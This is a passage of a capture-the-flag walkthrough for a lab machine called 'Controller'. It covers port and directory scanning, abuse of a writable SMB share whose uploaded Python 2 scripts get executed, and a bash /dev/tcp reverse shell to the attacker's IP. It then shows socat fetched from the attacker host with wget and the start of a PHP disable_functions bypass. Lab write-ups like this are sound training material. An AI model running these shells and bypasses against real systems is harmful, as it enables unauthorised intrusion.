khp99Hd2Ztlmgfy73EvaVMiNZFZeHwPGD6F8BG82jwNhhi73Vg==\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n49152\/tcp open  msrpc        syn-ack Microsoft Windows RPC\n49153\/tcp open  msrpc        syn-ack Microsoft Windows RPC\n49154\/tcp open  msrpc        syn-ack Microsoft Windows RPC\nService Info: OSs: Linux, Windows; CPE: cpe:\/o:linux:linux_kernel, cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled and required\n|_clock-skew: 51s\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 16534\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 2 (port 24699\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 3 (port 19523\/udp): CLEAN (Failed to receive data)\n|   Check 4 (port 60869\/udp): CLEAN (Failed to receive data)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n| nbstat: NetBIOS name: CONTROLLER, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: b0:aa:28:a5:49:7f (unknown)\n| Names:\n|   CONTROLLER&lt;00&gt;       Flags: &lt;unique&gt;&lt;active&gt;\n|   CONTROLLER&lt;03&gt;       Flags: &lt;unique&gt;&lt;active&gt;\n|   CONTROLLER&lt;20&gt;       Flags: &lt;unique&gt;&lt;active&gt;\n|   
CONTROL&lt;1b&gt;          Flags: &lt;unique&gt;&lt;active&gt;\n|   CONTROL&lt;1c&gt;          Flags: &lt;group&gt;&lt;active&gt;\n|   CONTROL&lt;00&gt;          Flags: &lt;group&gt;&lt;active&gt;\n|   __SAMBA__&lt;00&gt;        Flags: &lt;group&gt;&lt;active&gt;&lt;permanent&gt;\n|   __SAMBA__&lt;20&gt;        Flags: &lt;group&gt;&lt;active&gt;&lt;permanent&gt;\n| Statistics:\n|   b0:aa:28:a5:49:7f:00:00:d9:90:45:35:56:4d:00:00:f7\n|   f7:19:a5:28:00:00:7f:49:a5:28:f5:a0:7f:49:00:00:00\n|_  00:00:00:00:00:00:00:00:00:d0:00:00:00:00\n| smb2-time: \n|   date: 2024-09-05T03:13:15\n|_  start_date: N\/A<\/code><\/pre>\n<h3>Directory scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php -b 301,401,403,404 -q -t 100\n\/wp-login.php         (Status: 200) [Size: 8305]\n\/wp-trackback.php     (Status: 200) [Size: 136]\n\/xmlrpc.php           (Status: 405) [Size: 42]\n\/wp-signup.php        (Status: 302) [Size: 0] [--&gt; http:\/\/192.168.0.25\/wp-login.php?action=register]<\/code><\/pre>\n<h2>Vulnerability discovery<\/h2>\n<h3>Footprinting<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ curl -s http:\/\/$IP | html2text | uniq   \n\nSaltar_al_contenido\n****** CONTROLLER ******\nOtro sitio realizado con WordPress\n\n***** CONTROLLER *****\nA domain controller (DC) is a server computer that responds to security\nauthentication requests within a computer network domain. It is\na network server that is responsible for allowing host access to domain\nresources. It authenticates users, stores user account information and\nenforces security policy for a domain. 
It is most commonly implemented\nin Microsoft Windows environments (see Domain controller (Windows)), where it\nis the centerpiece of the Windows Active Directory service.\u2026 Seguir_leyendo\nCONTROLLER\n Publicada el 27 de junio de 2021\nCategorizado como Sin_categor\u00c3\u00ada\n\nBuscar... [Unknown INPUT type] [Buscar]\n\n***** Entradas recientes *****\n    * CONTROLLER\n***** Comentarios recientes *****\n    * Un_comentarista_de_WordPress en CONTROLLER\n\nCONTROLLER\nFunciona gracias a WordPress.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ whatweb http:\/\/$IP\nhttp:\/\/192.168.10.101 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.41 (Ubuntu)], IP[192.168.10.101], MetaGenerator[WordPress 5.7.2], PoweredBy[--], Script, Strict-Transport-Security[max-age=63072000; includeSubdomains], Title[CONTROLLER &amp;#8211; Otro sitio realizado con WordPress], UncommonHeaders[x-content-type-options,link], WordPress[5.7.2], X-Frame-Options[DENY]<\/code><\/pre>\n<p>Opening the site in a browser shows some strange resource requests:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410542.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410542.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905113425511\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>Open <code>burpsuite<\/code> and take a look:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410543.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410543.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905113705130\" \/><\/div><\/p>\n<p>Modify the rule so that it responds normally:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410544.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410544.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905113925076\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410545.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410545.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905114014025\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410546.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410546.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905115446736\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Sensitive ports<\/h3>\n<p>First, test the common sensitive ports:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ smbmap -H $IP\n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    
|   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  \\    \/:  ||: |_)  :)|.  \\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 1 SMB session(s)                                \n\n[+] IP: 192.168.10.101:445      Name: 192.168.10.101            Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        sysvol                                                  NO ACCESS\n        netlogon                                                NO ACCESS\n        tester                                                  READ, WRITE\n        IPC$                                                    NO ACCESS       IPC Service (Samba 4.11.6-Ubuntu)<\/code><\/pre>\n<p>One share is both readable and writable, so check whether anything is hidden in it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ smbclient \\\\\\\\$IP\\\\tester\nPassword for [WORKGROUP\\kali]:\nAnonymous login successful\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; dir\n  .                                   D        0  Wed Sep  4 23:26:53 2024\n  ..                                  D        0  Sun Jun 27 13:38:00 2021\n\n                20511312 blocks of size 1024. 
11633108 blocks available<\/code><\/pre>\n<p>Nothing is there. My guess is that something placed in this share may get executed, so upload a script to see whether it runs:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410547.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410547.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905114630626\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>That did not work. The actual reason is that the relevant modules are disabled, so try another approach:<\/p>\n<p>Besides the <code>os<\/code> and <code>subprocess<\/code> modules, the <code>commands<\/code> module can also be used:<\/p>\n<blockquote>\n<p>Note: this library is deprecated in python3 but can still be used in python2! The page content above also hints that the version in use is python2!<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">import commands\ncommands.getstatusoutput(&#039;ping -c 1 192.168.10.102&#039;)<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410548.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410548.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905120705836\" \/><\/div><\/p>\n<p>When re-uploading, the previously uploaded file was already gone and the ping had succeeded. The box author's intent here is presumably to give a hint by removing the uploaded script, so the next step is a reverse shell!<\/p>\n<pre><code class=\"language-bash\">import commands\ncommands.getstatusoutput(&#039;bash -c &quot;exec bash -i &amp;&gt;\/dev\/tcp\/192.168.10.102\/1234 &lt;&amp;1&quot;&#039;)<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410549.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410549.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905121118153\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>Success!<\/p>\n<h2>Privilege escalation<\/h2>\n<h3>Information gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) tester@controller:\/home\/tester$ whoami;id\ntester\nuid=1001(tester) gid=1001(tester) groups=1001(tester)\n(remote) tester@controller:\/home\/tester$ cat \/etc\/passwd | grep sh\nroot:x:0:0:root:\/root:\/bin\/bash\nsshd:x:112:65534::\/run\/sshd:\/usr\/sbin\/nologin\nserver:x:1000:1000:server:\/home\/server:\/bin\/bash\ntester:x:1001:1001::\/home\/tester:\/bin\/sh\nwebservices:x:1002:1002::\/home\/webservices:\/bin\/sh\n(remote) tester@controller:\/home\/tester$ ls -la \/home\ntotal 20\ndrwxr-xr-x  5 root        root        4096 Jun 27  2021 .\ndrwxr-xr-x 20 root        root        4096 Jun 27  2021 ..\ndrwxr-xr-x  3 server      server      4096 Jun 27  2021 server\ndrwxr-xr-x  4 tester      tester      4096 Jun 27  2021 tester\ndrwxr-xr-x  3 webservices webservices 4096 Jun 27  2021 webservices\n(remote) tester@controller:\/home\/tester$ cd \/home\/server\/\n(remote) tester@controller:\/home\/server$ ls -la\ntotal 32\ndrwxr-xr-x 3 server server 4096 Jun 27  2021 .\ndrwxr-xr-x 5 root   root   4096 Jun 27  2021 ..\nlrwxrwxrwx 1 server server    9 Jun 27  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 server server  220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 server server 3771 Feb 25  2020 .bashrc\ndrwx------ 2 server server 4096 Jun 27  2021 .cache\n-rw-r--r-- 1 server server  807 Feb 25  2020 .profile\n-rw-rw-r-- 1 server server   75 Jun 27  2021 .selected_editor\n-rw-r--r-- 1 server server    0 Jun 27  2021 .sudo_as_admin_successful\n-rw------- 1 server server  916 Jun 27  2021 .viminfo\n(remote) tester@controller:\/home\/server$ cd ..\/tester\/\n(remote) tester@controller:\/home\/tester$ ls -la\ntotal 36\ndrwxr-xr-x 4 tester tester 4096 Jun 27  2021 .\ndrwxr-xr-x 5 root   root   4096 Jun 27  2021 ..\nlrwxrwxrwx 1 tester tester    9 Jun 27  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 tester tester  220 Feb 
25  2020 .bash_logout\n-rw-r--r-- 1 tester tester 3771 Feb 25  2020 .bashrc\ndrwxrwxr-x 3 tester tester 4096 Jun 27  2021 .local\n-rw-r--r-- 1 tester tester  807 Feb 25  2020 .profile\n-rw-rw-r-- 1 tester tester   75 Jun 27  2021 .selected_editor\n-rw------- 1 tester tester 1948 Jun 27  2021 .viminfo\ndrwxrwxr-x 2 tester tester 4096 Jun 27  2021 scripts\n(remote) tester@controller:\/home\/tester$ cd .local\/\n(remote) tester@controller:\/home\/tester\/.local$ ls -la\ntotal 12\ndrwxrwxr-x 3 tester tester 4096 Jun 27  2021 .\ndrwxr-xr-x 4 tester tester 4096 Jun 27  2021 ..\ndrwx------ 3 tester tester 4096 Jun 27  2021 share\n(remote) tester@controller:\/home\/tester\/.local$ cd ..\/scripts\/\n(remote) tester@controller:\/home\/tester\/scripts$ ls -la\ntotal 16\ndrwxrwxr-x 2 tester tester 4096 Jun 27  2021 .\ndrwxr-xr-x 4 tester tester 4096 Jun 27  2021 ..\n-rw-rw-r-- 1 tester tester 3267 Sep  5 04:13 log.txt\n-rw-rw-r-- 1 tester tester  891 Jun 27  2021 tester.py\n(remote) tester@controller:\/home\/tester\/scripts$ cat log.txt \n.............\nfile \/srv\/smb\/tester\/ping.py removed\nScript runned succesfully\nScript runned succesfully\nScript runned succesfully\nScript runned succesfully\nScript runned succesfully\nScript runned succesfully\nScript runned succesfully\nScript runned succesfully\nfile \/srv\/smb\/tester\/ping1.py saved, testing...\nScript runned succesfully\nScript runned succesfully\nfile \/srv\/smb\/tester\/ping2.py saved, testing...\nScript runned succesfully\nScript runned succesfully\nScript runned succesfully\nScript runned succesfully\nScript runned succesfully\nfile \/srv\/smb\/tester\/shell.py saved, testing...\nfile \/srv\/smb\/tester\/shell.py saved, testing...\nScript runned succesfully\nScript runned succesfully\n(remote) tester@controller:\/home\/tester\/scripts$ cat tester.py\nimport os\ndirectory = &quot;\/srv\/smb\/tester\/&quot;\n\ndef listToString(s):\n    str1 = &#039;&#039;\n    for ele in lines: \n        str1 += ele  \n    
return str1    \nfor entry in os.listdir(directory):\n    files = directory + entry\n    with open(f&#039;{files}&#039;) as f:\n            lines = f.readlines()\n    lines = listToString(lines) \n    if &quot;socket&quot; in lines or &quot;os&quot; in lines or &quot;subprocess&quot; in lines:\n        os.system(f&quot;rm -f {files}&quot;)\n        os.system(f&quot;echo &#039;file {files} removed&#039; &gt;&gt; \/home\/tester\/scripts\/log.txt&quot;)\n    else:\n        os.system(f&quot;echo &#039;file {files} saved, testing...&#039; &gt;&gt; \/home\/tester\/scripts\/log.txt&quot;)\n        try:\n            os.system(f&quot;python2 {files}&quot;)\n        except Exception as e:\n            os.system(f&quot;echo &#039;An error ocurred: {e}&#039; &gt;&gt; \/home\/tester\/scripts\/log.txt&quot;) \n        os.system(f&quot;rm -f {files}&quot;)\n    f.close()\nos.system(f&quot;echo &#039;Script runned succesfully&#039; &gt;&gt; \/home\/tester\/scripts\/log.txt&quot;)\n(remote) tester@controller:\/home\/tester\/scripts$ cd ..\/..\/webservices\/\n(remote) tester@controller:\/home\/webservices$ ls -la\ntotal 36\ndrwxr-xr-x 3 webservices webservices 4096 Jun 27  2021 .\ndrwxr-xr-x 5 root        root        4096 Jun 27  2021 ..\nlrwxrwxrwx 1 webservices webservices    9 Jun 27  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 webservices webservices  220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 webservices webservices 3771 Feb 25  2020 .bashrc\ndrwxrwxr-x 3 webservices webservices 4096 Jun 27  2021 .local\n-rw-r--r-- 1 webservices webservices  807 Feb 25  2020 .profile\n-rw-rw-r-- 1 webservices webservices   75 Jun 27  2021 .selected_editor\n-rw------- 1 webservices webservices  916 Jun 27  2021 .viminfo\n-rw-rw-r-- 1 webservices webservices   14 Jun 27  2021 user.txt\n(remote) tester@controller:\/home\/webservices$ ps -aux\n............\nwebserv+     934  0.0  0.0   2608   548 ?        
Ss   03:06   0:00 \/bin\/sh -c php -S 127.0.0.1:8080 -t \/srv\/www\/php\/\nwebserv+     937  0.0  0.3 225620 31544 ?        S    03:06   0:00 php -S 127.0.0.1:8080 -t \/srv\/www\/php\/\n............\n(remote) tester@controller:\/home\/webservices$ ss -tnlup\n............\ntcp   LISTEN 0      4096                                   127.0.0.1:8080         0.0.0.0:*\n............<\/code><\/pre>\n<h3>Privilege escalation via file upload<\/h3>\n<pre><code class=\"language-bash\">(remote) tester@controller:\/srv\/www\/php$ ls -la\ntotal 20\ndrwxr-xr-x 3 webservices webservices 4096 Jun 27  2021 .\ndrwxr-xr-x 3 root        root        4096 Jun 27  2021 ..\n-rw-r--r-- 1 root        root          21 Jun 27  2021 phpinfo.php\n-rw-r--r-- 1 webservices webservices  806 Jun 27  2021 upload.php\ndrwxr-xr-x 2 webservices webservices 4096 Jun 27  2021 uploads\n(remote) tester@controller:\/srv\/www\/php$ cat phpinfo.php \n&lt;?php\n        phpinfo();\n?&gt;\n(remote) tester@controller:\/srv\/www\/php$ cat upload.php \n&lt;?php\n    if (isset($_FILES[&#039;upload&#039;])) {\n        $uploadDir = &#039;\/srv\/www\/php\/uploads\/&#039;; \/\/path you wish to store you uploaded files\n        $uploadedFile = $uploadDir . 
basename($_FILES[&#039;upload&#039;][&#039;name&#039;]);\n        if(move_uploaded_file($_FILES[&#039;upload&#039;][&#039;tmp_name&#039;], $uploadedFile)) {\n            echo &#039;File was uploaded successfully.&#039;;\n        } else {\n            echo &#039;There was a problem saving the uploaded file&#039;;\n        }\n        echo &#039;&lt;br\/&gt;&lt;a href=&quot;upload.php&quot;&gt;Back to Uploader&lt;\/a&gt;&#039;;\n    } else {\n    ?&gt;\n        &lt;form action=&quot;upload.php&quot; method=&quot;post&quot; enctype=&quot;multipart\/form-data&quot;&gt;\n            &lt;label for=&quot;upload&quot;&gt;File:&lt;\/label&gt;\n            &lt;input type=&quot;file&quot; name=&quot;upload&quot; id=&quot;upload&quot;&gt;&lt;br\/&gt;\n            &lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;Upload&quot;&gt;\n            &lt;\/form&gt;\n        &lt;?php\n    }\n?&gt;\n(remote) tester@controller:\/srv\/www\/php$ cd uploads\/\n(remote) tester@controller:\/srv\/www\/php\/uploads$ ls -la\ntotal 8\ndrwxr-xr-x 2 webservices webservices 4096 Jun 27  2021 .\ndrwxr-xr-x 3 webservices webservices 4096 Jun 27  2021 ..<\/code><\/pre>\n<p>Try uploading socat to forward the port:<\/p>\n<pre><code class=\"language-bash\">(remote) tester@controller:\/srv\/www\/php\/uploads$ cd \/tmp\n(remote) tester@controller:\/tmp$ wget http:\/\/192.168.10.102:8888\/socat\n(remote) tester@controller:\/tmp$ chmod +x socat\n(remote) tester@controller:\/tmp$ ss -tnlup | grep 80\nudp    UNCONN  0       0               [fe80::a00:27ff:fecb:7eec]%enp0s3:546                               [::]:*                                               \ntcp    LISTEN  0       4096                                    127.0.0.1:8080                           0.0.0.0:*                                               \ntcp    LISTEN  0       511                                             *:80                                   *:*                                              
 \n(remote) tester@controller:\/tmp$ .\/socat TCP-LISTEN:8000,fork TCP4:127.0.0.1:8080\n^C\n(remote) tester@controller:\/tmp$ .\/socat TCP-LISTEN:8000,fork TCP4:127.0.0.1:8080&amp;\n[1] 14620<\/code><\/pre>\n<p>Then try an upload:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410550.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410550.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905124130674\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>First take a look at phpinfo:<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.101:8000\/phpinfo.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410551.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410551.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905124427049\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>It shows some disabled functions; try to bypass them: <a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/php-tricks-esp\/php-useful-functions-disable_functions-open_basedir-bypass\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/php-tricks-esp\/php-useful-functions-disable_functions-open_basedir-bypass<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ git clone https:\/\/github.com\/teambi0s\/dfunc-bypasser.git\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ cd dfunc-bypasser\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller\/dfunc-bypasser]\n\u2514\u2500$ python2 dfunc-bypasser.py -h 2&gt;\/dev\/null\nusage: dfunc-bypasser.py [-h] [--url URL] [--file FILE]\n\noptional arguments:\n  -h, --help   show this help message and exit\n  --url URL    PHPinfo URL: eg. https:\/\/example.com\/phpinfo.php\n  --file FILE  PHPinfo localfile path: eg. dir\/phpinfo\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller\/dfunc-bypasser]\n\u2514\u2500$ python2 dfunc-bypasser.py --url http:\/\/192.168.10.101:8000\/phpinfo.php 2&gt;\/dev\/null\n\n                                ,---,     \n          